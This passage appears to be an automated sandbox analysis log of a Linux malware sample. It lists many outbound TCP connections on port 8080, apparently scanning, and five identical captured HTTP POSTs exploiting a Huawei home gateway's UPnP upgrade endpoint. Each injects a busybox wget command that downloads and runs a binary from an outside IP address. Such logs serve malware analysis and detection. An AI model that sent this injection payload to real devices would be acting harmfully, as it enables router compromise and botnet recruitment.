    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.50.126.125:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.31.220.133:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.224.109.76:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.133.169.163:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.38.193.63:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.29.203.40:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.241.154.240:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.31.139.39:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.94.22.93:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.121.209.153:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.141.36.123:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.134.35.84:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.38.47.188:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.190.100.116:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.160.63.34:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.246.55.21:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.170.228.169:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.224.74.115:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.92.183.184:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.244.151.249:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.204.76.106:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.195.209.7:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.141.91.11:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.33.15.218:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.180.64.247:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.195.180.163:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.158.4.251:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.190.253.13:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.119.161.144:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.56.182.173:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.2.66.134:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.50.64.86:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.75.8.218:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.109.162.154:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.192.58.105:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.61.246.165:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.50.207.55:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.84.9.174:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.104.61.150:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.94.61.199:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.141.57.117:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.248.126.139:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.194.223.64:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.8.23.171:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.153.98.197:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.159.16.60:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.190.53.46:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.234.15.230:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.56.102.169:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.12.169.221:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.32.230.73:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.233.9.44:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.9.106.129:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.173.7.144:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.223.42.254:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.65.4.83:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.110.222.38:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.166.233.205:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.144.90.80:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.146.195.121:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.173.106.76:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.186.151.152:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.255.4.93:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.51.8.207:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.179.97.211:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.39.95.184:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.118.69.212:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.54.71.123:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.21.172.98:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.33.2.33:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.15.58.36:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.222.188.223:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.54.87.231:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.35.15.245:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.7.125.116:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.208.166.9:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.30.180.251:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.3.24.222:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.6.74.192:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.42.253.25:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.134.14.234:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.168.26.250:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.254.223.40:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.177.199.208:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.113.185.177:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.210.186.66:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.52.151.68:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.224.235.99:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.227.193.167:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.81.172.213:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.184.252.221:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.192.218.2:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.130.233.225:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.221.143.187:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.34.206.11:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.2.84.123:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.6.138.223:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.238.173.216:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.96.204.209:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.197.2.214:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.78.11.55:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.70.71.70:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.56.16.156:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.177.14.69:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.88.52.241:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.9.22.29:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.61.130.137:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.60.104.250:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.153.138.178:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.188.221.219:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.142.177.162:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.152.103.205:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.42.139.194:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.138.35.27:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.213.156.169:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.108.190.227:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.245.4.32:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.143.89.76:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.100.249.42:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.186.80.141:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.66.14.198:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.140.143.109:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.77.83.209:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.218.224.125:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.123.16.245:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.61.80.165:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.171.197.13:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.184.64.35:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.104.229.250:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.227.175.174:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.113.255.220:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.23.112.170:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.75.208.104:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.64.195.93:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.187.210.126:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.108.7.163:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.17.150.216:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.113.85.133:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.193.46.31:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.131.111.219:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.50.184.154:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.13.154.126:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.32.185.181:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.32.210.103:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.53.174.247:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.67.76.220:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.46.87.189:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.135.133.32:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.122.61.44:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.247.118.191:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.84.20.128:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.215.64.219:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.55.144.242:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.254.82.185:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.155.143.157:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.47.91.246:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.193.120.223:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.100.118.22:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.153.49.197:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.13.68.6:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.160.203.116:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.12.59.106:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.50.112.119:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.236.105.175:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.77.205.108:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.239.35.76:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.177.214.93:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.34.159.85:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.146.202.149:8080
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: /tmp/uR2hnJKQGC.elf (PID: 6269)Socket: 127.0.0.1::23455Jump to behavior
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 41.238.253.12
    Source: unknownTCP traffic detected without corresponding DNS query: 41.233.251.12
